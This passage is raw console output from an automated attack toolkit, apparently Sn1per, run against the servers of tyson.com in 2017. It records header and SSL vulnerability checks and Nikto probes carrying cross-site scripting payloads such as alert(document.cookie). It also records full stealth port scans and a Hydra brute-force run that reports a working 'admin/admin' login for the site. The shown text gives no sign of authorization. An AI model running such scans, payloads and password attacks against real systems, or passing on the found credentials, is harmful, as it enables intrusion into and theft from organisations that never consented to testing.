801. + -- --=[Site not vulnerable to Cross-Site Tracing!
802. + -- --=[Site not vulnerable to Host Header Injection!
803. + -- --=[Site vulnerable to Cross-Frame Scripting!
804. + -- --=[Site vulnerable to Clickjacking!
805.  
806. HTTP/1.1 301 Moved Permanently
807. Content-Type: text/html; charset=UTF-8
808. Location: http://www.tyson.com/
809. Server: Microsoft-IIS/8.0
810. X-Powered-By: ASP.NET
811. Date: Fri, 14 Jul 2017 20:42:34 GMT
812. Content-Length: 144
813.  
814. <head><title>Document Moved</title></head>
815. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/">here</a></body>
816. HTTP/1.1 301 Moved Permanently
817. Content-Type: text/html; charset=UTF-8
818. Location: http://www.tyson.com/
819. Server: Microsoft-IIS/8.0
820. X-Powered-By: ASP.NET
821. Date: Fri, 14 Jul 2017 20:42:34 GMT
822. Content-Length: 144
823.  
824. <head><title>Document Moved</title></head>
825. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/">here</a></body>
826.  
827.  
828.  
829. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
830. + -- --=[Checking if X-Content options are enabled on tyson.com...
831.  
832. + -- --=[Checking if X-Frame options are enabled on tyson.com...
833.  
834. + -- --=[Checking if X-XSS-Protection header is enabled on tyson.com...
835.  
836. + -- --=[Checking HTTP methods on tyson.com...
837.  
838. + -- --=[Checking if TRACE method is enabled on tyson.com...
839.  
840. + -- --=[Checking for META tags on tyson.com...
841.  
842. + -- --=[Checking for open proxy on tyson.com...
843.  
844. + -- --=[Enumerating software on tyson.com...
845. Server: Microsoft-IIS/8.0
846. X-Powered-By: ASP.NET
847.  
848. + -- --=[Checking if Strict-Transport-Security is enabled on tyson.com...
849.  
850. + -- --=[Checking for Flash cross-domain policy on tyson.com...
851. <head><title>Document Moved</title></head>
852. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/crossdomain.xml">here</a></body>
853. + -- --=[Checking for Silverlight cross-domain policy on tyson.com...
854. <head><title>Document Moved</title></head>
855. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/clientaccesspolicy.xml">here</a></body>
856. + -- --=[Checking for HTML5 cross-origin resource sharing on tyson.com...
857.  
858. + -- --=[Retrieving robots.txt on tyson.com...
859. <head><title>Document Moved</title></head>
860. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/robots.txt">here</a></body>
861. + -- --=[Retrieving sitemap.xml on tyson.com...
862. <head><title>Document Moved</title></head>
863. <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/sitemap.xml">here</a></body>
864. + -- --=[Checking cookie attributes on tyson.com...
865.  
866. + -- --=[Checking for ASP.NET Detailed Errors on tyson.com...
867. <h2>Object moved to <a href="/Unexpected-Error?aspxerrorpath=/?.jsp">here</a>.</h2>
868. <section id="error_container">
869. <div id="error_detail">
870. <div class="error-image"></div>
871.  
872.  
873. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
874. - Nikto v2.1.6
875. ---------------------------------------------------------------------------
876. + Target IP: 65.52.220.144
877. + Target Hostname: tyson.com
878. + Target Port: 80
879. + Start Time: 2017-07-14 16:46:01 (GMT-4)
880. ---------------------------------------------------------------------------
881. + Server: Microsoft-IIS/8.0
882. + Retrieved x-powered-by header: ASP.NET
883. + The anti-clickjacking X-Frame-Options header is not present.
884. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
885. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
886. + Root page / redirects to: http://www.tyson.com/
887. + No CGI Directories found (use '-C all' to force check all possible dirs)
888. + Retrieved x-aspnet-version header: 4.0.30319
889. + OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
890. + /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
891. + /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
892. + OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
893. + OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
894. + 7457 requests: 3 error(s) and 10 item(s) reported on remote host
895. + End Time: 2017-07-14 17:08:37 (GMT-4) (1356 seconds)
896. ---------------------------------------------------------------------------
897. + 1 host(s) tested
898. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
899. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/tyson.com-port80.jpg
900. + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
901. + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
902.  
903. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
904. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
905. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
906. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
907. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
908. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
909. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
910.  
911. __[ ! ] Neither war between hackers, nor peace for the system.
912. __[ ! ] http://blog.inurl.com.br
913. __[ ! ] http://fb.com/InurlBrasil
914. __[ ! ] http://twitter.com/@googleinurl
915. __[ ! ] http://github.com/googleinurl
916. __[ ! ] Current PHP version::[ 7.0.20-2 ]
917. __[ ! ] Current script owner::[ root ]
918. __[ ! ] Current uname::[ Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.18-1kali1 (2017-04-04) x86_64 ]
919. __[ ! ] Current pwd::[ /usr/share/sniper ]
920. __[ ! ] Help: php inurlbr.php --help
921. ------------------------------------------------------------------------------------------------------------------------
922. [ INFO ] INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install
923. + -- --=[Port 110 closed... skipping.
924. + -- --=[Port 111 closed... skipping.
925. + -- --=[Port 135 closed... skipping.
926. + -- --=[Port 139 closed... skipping.
927. + -- --=[Port 161 closed... skipping.
928. + -- --=[Port 162 closed... skipping.
929. + -- --=[Port 389 closed... skipping.
930. + -- --=[Port 443 opened... running tests...
931. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
932.  
933. ^ ^
934. _ __ _ ____ _ __ _ _ ____
935. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
936. | V V // o // _/ | V V // 0 // 0 // _/
937. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
938. <
939. ...'
940.  
941. WAFW00F - Web Application Firewall Detection Tool
942.  
943. By Sandro Gauci && Wendel G. Henrique
944.  
945. Checking https://tyson.com
946. ERROR:root:Site https://tyson.com appears to be down
947.  
948. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
949. /usr/share/whatweb/lib/target.rb:189: warning: constant ::TimeoutError is deprecated
950. https://tyson.com ERROR: Connection reset by peer - SSL_connect
951.  
952. + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
953.  
954.  
955.  
956. AVAILABLE PLUGINS
957. -----------------
958.  
959. PluginSessionRenegotiation
960. PluginChromeSha1Deprecation
961. PluginHSTS
962. PluginHeartbleed
963. PluginCertInfo
964. PluginOpenSSLCipherSuites
965. PluginSessionResumption
966. PluginCompression
967.  
968.  
969.  
970. CHECKING HOST(S) AVAILABILITY
971. -----------------------------
972.  
973. tyson.com:443 => 65.52.220.144:443
974.  
975.  
976.  
977. SCAN RESULTS FOR TYSON.COM:443 - 65.52.220.144:443
978. --------------------------------------------------
979.  
980. Unhandled exception when processing --compression:
981. utils.SSLyzeSSLConnection.SSLHandshakeRejected - TCP / Received RST
982.  
983. Unhandled exception when processing --reneg:
984. utils.SSLyzeSSLConnection.SSLHandshakeRejected - TCP / Received RST
985.  
986. * Session Resumption:
987. With Session IDs: ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
988. ERROR #1: SSLHandshakeRejected - TCP / Received RST
989. ERROR #2: SSLHandshakeRejected - TCP / Received RST
990. ERROR #3: SSLHandshakeRejected - TCP / Received RST
991. ERROR #4: SSLHandshakeRejected - TCP / Received RST
992. ERROR #5: SSLHandshakeRejected - TCP / Received RST
993. With TLS Session Tickets: ERROR: SSLHandshakeRejected - TCP / Received RST
994.  
995. * SSLV2 Cipher Suites:
996. Server rejected all cipher suites.
997.  
998. Unhandled exception when processing --certinfo:
999. utils.SSLyzeSSLConnection.SSLHandshakeRejected - TCP / Received RST
1000.  
1001. * SSLV3 Cipher Suites:
1002. Undefined - An unexpected error happened:
1003. EXP-DES-CBC-SHA timeout - timed out
1004. EXP-ADH-DES-CBC-SHA timeout - timed out
1005. ECDHE-ECDSA-RC4-SHA timeout - timed out
1006. ECDH-RSA-RC4-SHA timeout - timed out
1007. ECDH-ECDSA-NULL-SHA timeout - timed out
1008. DHE-RSA-CAMELLIA128-SHA timeout - timed out
1009. DHE-DSS-SEED-SHA timeout - timed out
1010. DHE-DSS-CAMELLIA128-SHA timeout - timed out
1011. DH-RSA-CAMELLIA128-SHA timeout - timed out
1012. DH-DSS-AES128-SHA timeout - timed out
1013. AECDH-RC4-SHA timeout - timed out
1014.  
1015.  
1016.  
1017. SCAN COMPLETED IN 34.87 S
1018. -------------------------
1019. Version: 1.11.9-static
1020. OpenSSL 1.0.2l-dev xx XXX xxxx
1021.  
1022. Testing SSL server tyson.com on port 443 using SNI name tyson.com
1023.  
1024. TLS Fallback SCSV:
1025. Server does not support TLS Fallback SCSV
1026.  
1027. TLS renegotiation:
1028. Session renegotiation not supported
1029.  
1030. TLS Compression:
1031. Compression disabled
1032.  
1033. Heartbleed:
1034. TLS 1.2 not vulnerable to heartbleed
1035. TLS 1.1 not vulnerable to heartbleed
1036. TLS 1.0 not vulnerable to heartbleed
1037.  
1038. Supported Server Cipher(s):
1039.  
1040. ###########################################################
1041. testssl 2.9dev from https://testssl.sh/dev/
1042.  
1043. This program is free software. Distribution and
1044. modification under GPLv2 permitted.
1045. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
1046.  
1047. Please file bugs @ https://testssl.sh/bugs/
1048.  
1049. ###########################################################
1050.  
1051. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
1052. on kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
1053. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
1054.  
1055.  
1056. Start 2017-07-14 17:10:49 -->> 65.52.220.144:443 (tyson.com) <<--
1057.  
1058. rDNS (65.52.220.144): --
1059.  
1060. 65.52.220.144:443 doesn't seem to be a TLS/SSL enabled server
1061. The results might look ok but they could be nonsense. Really proceed ? ("yes" to continue) --> yes
1062. Service detected: Couldn't determine what's running on port 443, assuming no HTTP service => skipping all HTTP checks
1063.  
1064.  
1065. Testing protocols via sockets except SPDY+HTTP2
1066.  
1067. SSLv2 not offered (OK)
1068. SSLv3 not offered (OK)
1069. TLS 1 not offered
1070. TLS 1.1 not offered
1071. TLS 1.2 not offered
1072. SPDY/NPN (SPDY is an HTTP protocol and thus not tested here)
1073. HTTP2/ALPN (HTTP/2 is a HTTP protocol and thus not tested here)
1074.  
1075.  
1076. Testing ~standard cipher categories
1077.  
1078. NULL ciphers (no encryption) not offered (OK)
1079. Anonymous NULL Ciphers (no authentication) not offered (OK)
1080. Export ciphers (w/o ADH+NULL) not offered (OK)
1081. LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
1082. Weak 128 Bit ciphers not offered (OK)
1083. Triple DES Ciphers (Medium) not offered (OK)
1084. High grade encryption not offered
1085. Strong grade encryption (AEAD ciphers) not offered
1086.  
1087.  
1088. Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
1089.  
1090. No ciphers supporting Forward Secrecy offered
1091.  
1092.  
1093. Testing server preferences
1094.  
1095. Has server cipher order? no matching cipher in this list found (pls report this): DES-CBC3-SHA:RC4-MD5:DES-CBC-SHA:RC4-SHA:AES128-SHA:AES128-SHA256:AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:ECDH-RSA-DES-CBC3-SHA:ECDH-RSA-AES128-SHA:ECDH-RSA-AES256-SHA:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:DHE-DSS-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:AES256-SHA256 .
1096. y
1097.  
1098. Testing server defaults (Server Hello)
1099.  
1100. TLS extensions (standard) (none)
1101. Session Tickets RFC 5077 (none)
1102. SSL Session ID support yes
1103. Session Resumption Ticket: no extension=no resumption, ID resumption test failed, pls report
1104. TLS clock skew SSLv3 through TLS 1.2 didn't return a timestamp
1105.  
1106. Testing vulnerabilities
1107.  
1108. Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
1109. CCS (CVE-2014-0224) not vulnerable (OK)
1110. Ticketbleed (CVE-2016-9244), experiment. -- (applicable only for HTTPS)
1111. Secure Renegotiation (CVE-2009-3555) handshake didn't succeed
1112. Secure Client-Initiated Renegotiation not vulnerable (OK)
1113. CRIME, TLS (CVE-2012-4929) test failed (couldn't connect)
1114. POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
1115. TLS_FALLBACK_SCSV (RFC 7507) No fallback possible, TLS 1.2 is the only protocol (OK)
1116. SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
1117. FREAK (CVE-2015-0204) not vulnerable (OK)
1118. DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this port (OK)
1119. no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
1120. LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
1121. BEAST (CVE-2011-3389) no SSL3 or TLS1 (OK)
1122. LUCKY13 (CVE-2013-0169) not vulnerable (OK)
1123. RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
1124.  
1125.  
1126. Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
1127.  
1128. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
1129. -----------------------------------------------------------------------------------------------------------------------------
1130.  
1131.  
1132. Done 2017-07-14 17:24:59 [ 853s] -->> 65.52.220.144:443 (tyson.com) <<--
1133.  
1134.  
1135.  
1136. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
1137. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
1138. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
1139. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
1140. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
1141. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
1142. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
1143. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1144. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
1145. ░ ░
1146. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
1147. + -- --=[Checking for DROWN (SSLv2): 65.52.220.144:443
1148. + -- --=[Checking for HeartBleed: 65.52.220.144:443
1149. + -- --=[Checking for OpenSSL CCS: 65.52.220.144:443
1150. sysread error: Connection reset by peer
1151. + -- --=[Checking for Poodle (SSLv3): 65.52.220.144:443
1152. + -- --=[Checking for WinShock (MS14-066): 65.52.220.144:443
1153. Testing if OpenSSL supports the ciphers we are checking for: YES
1154.  
1155. Testing 65.52.220.144:443 for availability of SSL ciphers added in MS14-066...
1156. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
1157. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
1158. Testing cipher AES256-GCM-SHA384: UNSUPPORTED
1159. Testing cipher AES128-GCM-SHA256: UNSUPPORTED
1160. Testing if IIS is running on port 443: NO
1161. Checking if target system is running Windows Server 2012 or later...
1162. Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
1163. Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
1164. 65.52.220.144:443 is patched: NO
1165. + -- --=[Scan Complete!
1166. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
1167. + -- --=[Checking if X-Content options are enabled on tyson.com...
1168.  
1169. + -- --=[Checking if X-Frame options are enabled on tyson.com...
1170.  
1171. + -- --=[Checking if X-XSS-Protection header is enabled on tyson.com...
1172.  
1173. + -- --=[Checking HTTP methods on tyson.com...
1174.  
1175. + -- --=[Checking if TRACE method is enabled on tyson.com...
1176.  
1177. + -- --=[Checking for META tags on tyson.com...
1178.  
1179. + -- --=[Checking for open proxy on tyson.com...
1180.  
1181. + -- --=[Enumerating software on tyson.com...
1182.  
1183. + -- --=[Checking if Strict-Transport-Security is enabled on tyson.com...
1184.  
1185. + -- --=[Checking for Flash cross-domain policy on tyson.com...
1186.  
1187. + -- --=[Checking for Silverlight cross-domain policy on tyson.com...
1188.  
1189. + -- --=[Checking for HTML5 cross-origin resource sharing on tyson.com...
1190.  
1191. + -- --=[Retrieving robots.txt on tyson.com...
1192.  
1193. + -- --=[Retrieving sitemap.xml on tyson.com...
1194.  
1195. + -- --=[Checking cookie attributes on tyson.com...
1196.  
1197. + -- --=[Checking for ASP.NET Detailed Errors on tyson.com...
1198.  
1199.  
1200. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
1201. - Nikto v2.1.6
1202. ---------------------------------------------------------------------------
1203. + No web server found on tyson.com:443
1204. ---------------------------------------------------------------------------
1205. + 0 host(s) tested
1206. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
1207. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/tyson.com-port443.jpg
1208. + -- --=[Port 445 closed... skipping.
1209. + -- --=[Port 512 closed... skipping.
1210. + -- --=[Port 513 closed... skipping.
1211. + -- --=[Port 514 closed... skipping.
1212. + -- --=[Port 1433 closed... skipping.
1213. + -- --=[Port 2049 closed... skipping.
1214. + -- --=[Port 2121 closed... skipping.
1215. + -- --=[Port 3306 closed... skipping.
1216. + -- --=[Port 3310 closed... skipping.
1217. + -- --=[Port 3128 closed... skipping.
1218. + -- --=[Port 3389 opened... running tests...
1219.  
1220. Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-14 17:28 EDT
1221. Stats: 0:00:14 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
1222. Ping Scan Timing: About 100.00% done; ETC: 17:28 (0:00:00 remaining)
1223. Nmap scan report for tyson.com (65.52.220.144)
1224. Host is up (0.0074s latency).
1225. PORT STATE SERVICE VERSION
1226. 3389/tcp open ms-wbt-server?
1227. |_rdp-enum-encryption: Packet too short
1228. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1229. Device type: bridge
1230. Running: Oracle Virtualbox
1231. OS CPE: cpe:/o:oracle:virtualbox
1232. OS details: Oracle Virtualbox
1233. Network Distance: 2 hops
1234.  
1235. TRACEROUTE (using port 80/tcp)
1236. HOP RTT ADDRESS
1237. 1 0.31 ms 10.0.2.2
1238. 2 0.40 ms 65.52.220.144
1239.  
1240. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1241. Nmap done: 1 IP address (1 host up) scanned in 60.66 seconds
1242. + -- --=[Port 3632 closed... skipping.
1243. + -- --=[Port 4443 closed... skipping.
1244. + -- --=[Port 5432 closed... skipping.
1245. + -- --=[Port 5800 closed... skipping.
1246. + -- --=[Port 5900 closed... skipping.
1247. + -- --=[Port 5984 closed... skipping.
1248. + -- --=[Port 6000 closed... skipping.
1249. + -- --=[Port 6667 closed... skipping.
1250. + -- --=[Port 8000 closed... skipping.
1251. + -- --=[Port 8100 closed... skipping.
1252. + -- --=[Port 8080 closed... skipping.
1253. + -- --=[Port 8180 closed... skipping.
1254. + -- --=[Port 8443 closed... skipping.
1255. + -- --=[Port 8888 closed... skipping.
1256. + -- --=[Port 10000 closed... skipping.
1257. + -- --=[Port 27017 closed... skipping.
1258. + -- --=[Port 27018 closed... skipping.
1259. + -- --=[Port 27019 closed... skipping.
1260. + -- --=[Port 28017 closed... skipping.
1261. + -- --=[Port 49152 closed... skipping.
1262. + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
1263. Autoselected keyboard map en-us
1264. ERROR: Connection closed
1265. #########################################################################################
1266. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
1267. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
1268. `888. .8' .88888. Y88bo. 888 8 888 888
1269. `888.8' .8' `888. `ZY8888o. 888 8 888 888
1270. `888' .88ooo8888. `0Y88b 888 8 888 888
1271. 888 .8' `888. oo .d8P `88. .8' `88b d88'
1272. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
1273. Welcome to Yasuo v2.3
1274. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
1275. #########################################################################################
1276.  
1277. I, [2017-07-14T17:29:45.010726 #9183] INFO -- : Initiating port scan
1278. I, [2017-07-14T17:30:36.556152 #9183] INFO -- : Using nmap scan output file logs/nmap_output_2017-07-14_17-29-45.xml
1279. I, [2017-07-14T17:30:36.561898 #9183] INFO -- : Discovered open port: 65.52.220.144:80
1280. I, [2017-07-14T17:30:37.747002 #9183] INFO -- : Discovered open port: 65.52.220.144:443
1281. I, [2017-07-14T17:30:38.106157 #9183] INFO -- : <<<Enumerating vulnerable applications>>>
1282.  
1283.  
1284. --------------------------------------------------------
1285. <<<Yasuo discovered following vulnerable applications>>>
1286. --------------------------------------------------------
1287. +----------+--------------------+-------------------+----------+----------+
1288. | App Name | URL to Application | Potential Exploit | Username | Password |
1289. +----------+--------------------+-------------------+----------+----------+
1290. +----------+--------------------+-------------------+----------+----------+
1291. + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +
1292.  
1293. Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-14 17:32 EDT
1294. NSE: Loaded 40 scripts for scanning.
1295. Initiating Ping Scan at 17:32
1296. Scanning tyson.com (65.52.220.144) [4 ports]
1297. Completed Ping Scan at 17:32, 0.03s elapsed (1 total hosts)
1298. Initiating Parallel DNS resolution of 1 host. at 17:32
1299. Completed Parallel DNS resolution of 1 host. at 17:32, 11.05s elapsed
1300. Initiating SYN Stealth Scan at 17:32
1301. Scanning tyson.com (65.52.220.144) [65355 ports]
1302. Discovered open port 443/tcp on 65.52.220.144
1303. Discovered open port 3389/tcp on 65.52.220.144
1304. Discovered open port 80/tcp on 65.52.220.144
1305. SYN Stealth Scan Timing: About 5.19% done; ETC: 17:45 (0:12:11 remaining)
1306. Increasing send delay for 65.52.220.144 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
1307. SYN Stealth Scan Timing: About 8.08% done; ETC: 17:47 (0:13:16 remaining)
1308. SYN Stealth Scan Timing: About 14.48% done; ETC: 17:47 (0:12:30 remaining)
1309. SYN Stealth Scan Timing: About 22.03% done; ETC: 17:47 (0:11:44 remaining)
1310. SYN Stealth Scan Timing: About 32.33% done; ETC: 17:48 (0:10:55 remaining)
1311. SYN Stealth Scan Timing: About 38.70% done; ETC: 17:49 (0:10:05 remaining)
1312. SYN Stealth Scan Timing: About 44.49% done; ETC: 17:49 (0:09:15 remaining)
1313. SYN Stealth Scan Timing: About 50.00% done; ETC: 17:49 (0:08:22 remaining)
1314. SYN Stealth Scan Timing: About 55.13% done; ETC: 17:49 (0:07:30 remaining)
1315. SYN Stealth Scan Timing: About 60.88% done; ETC: 17:49 (0:06:40 remaining)
1316. SYN Stealth Scan Timing: About 65.95% done; ETC: 17:49 (0:05:46 remaining)
1317. SYN Stealth Scan Timing: About 70.98% done; ETC: 17:49 (0:04:54 remaining)
1318. SYN Stealth Scan Timing: About 76.15% done; ETC: 17:49 (0:04:00 remaining)
1319. SYN Stealth Scan Timing: About 81.20% done; ETC: 17:49 (0:03:09 remaining)
1320. SYN Stealth Scan Timing: About 86.59% done; ETC: 17:49 (0:02:15 remaining)
1321. SYN Stealth Scan Timing: About 91.83% done; ETC: 17:49 (0:01:22 remaining)
1322. SYN Stealth Scan Timing: About 96.87% done; ETC: 17:49 (0:00:31 remaining)
1323. Completed SYN Stealth Scan at 17:49, 1002.57s elapsed (65355 total ports)
1324. Initiating Service scan at 17:49
1325. Scanning 3 services on tyson.com (65.52.220.144)
1326. Completed Service scan at 17:49, 23.67s elapsed (3 services on 1 host)
1327. Initiating OS detection (try #1) against tyson.com (65.52.220.144)
1328. NSE: Script scanning 65.52.220.144.
1329. Initiating NSE at 17:49
1330. Completed NSE at 17:49, 1.12s elapsed
1331. Initiating NSE at 17:49
1332. Completed NSE at 17:49, 0.14s elapsed
1333. Nmap scan report for tyson.com (65.52.220.144)
1334. Host is up (0.025s latency).
1335. Not shown: 65352 filtered ports
1336. PORT STATE SERVICE VERSION
1337. 80/tcp open http Microsoft IIS httpd 8.0
1338. 443/tcp open https?
1339. 3389/tcp open ms-wbt-server?
1340. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1341. Device type: bridge
1342. Running: Oracle Virtualbox
1343. OS CPE: cpe:/o:oracle:virtualbox
1344. OS details: Oracle Virtualbox
1345. TCP Sequence Prediction: Difficulty=17 (Good luck!)
1346. IP ID Sequence Generation: Incremental
1347. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
1348.  
1349. Read data files from: /usr/bin/../share/nmap
1350. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1351. Nmap done: 1 IP address (1 host up) scanned in 1041.06 seconds
1352. Raw packets sent: 131459 (5.784MB) | Rcvd: 728 (29.160KB)
1353. + -- ----------------------------=[Running Brute Force]=--------------------- -- +
1354. __________ __ ____ ___
1355. \______ \_______ __ ___/ |_ ____ \ \/ /
1356. | | _/\_ __ \ | \ __\/ __ \ \ /
1357. | | \ | | \/ | /| | \ ___/ / \
1358. |______ / |__| |____/ |__| \___ >___/\ \
1359. \/ \/ \_/
1360.  
1361. + -- --=[BruteX v1.5 by 1N3
1362. + -- --=[http://crowdshield.com
1363.  
1364.  
1365. ################################### Running Port Scan ##############################
1366.  
1367. Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-14 17:49 EDT
1368. Nmap scan report for tyson.com (65.52.220.144)
1369. Host is up (0.019s latency).
1370. Not shown: 23 filtered ports
1371. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1372. PORT STATE SERVICE
1373. 80/tcp open http
1374. 443/tcp open https
1375. 3389/tcp open ms-wbt-server
1376.  
1377. Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds
1378.  
1379. ################################### Running Brute Force ############################
1380.  
1381. + -- --=[Port 21 closed... skipping.
1382. + -- --=[Port 22 closed... skipping.
1383. + -- --=[Port 23 closed... skipping.
1384. + -- --=[Port 25 closed... skipping.
1385. + -- --=[Port 80 opened... running tests...
1386. Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1387.  
1388. Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-14 17:50:04
1389. [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
1390. [DATA] max 1 task per 1 server, overall 64 tasks, 1496 login tries (l:34/p:44), ~23 tries per task
1391. [DATA] attacking service http-get on port 80
1392. [80][http-get] host: tyson.com login: admin password: admin
1393. [STATUS] attack finished for tyson.com (valid pair found)
1394. 1 of 1 target successfully completed, 1 valid password found
1395. Hydra (http://www.thc.org/thc-hydra) finished at 2017-07-14 17:50:15
1396. + -- --=[Port 110 closed... skipping.
1397. + -- --=[Port 139 closed... skipping.
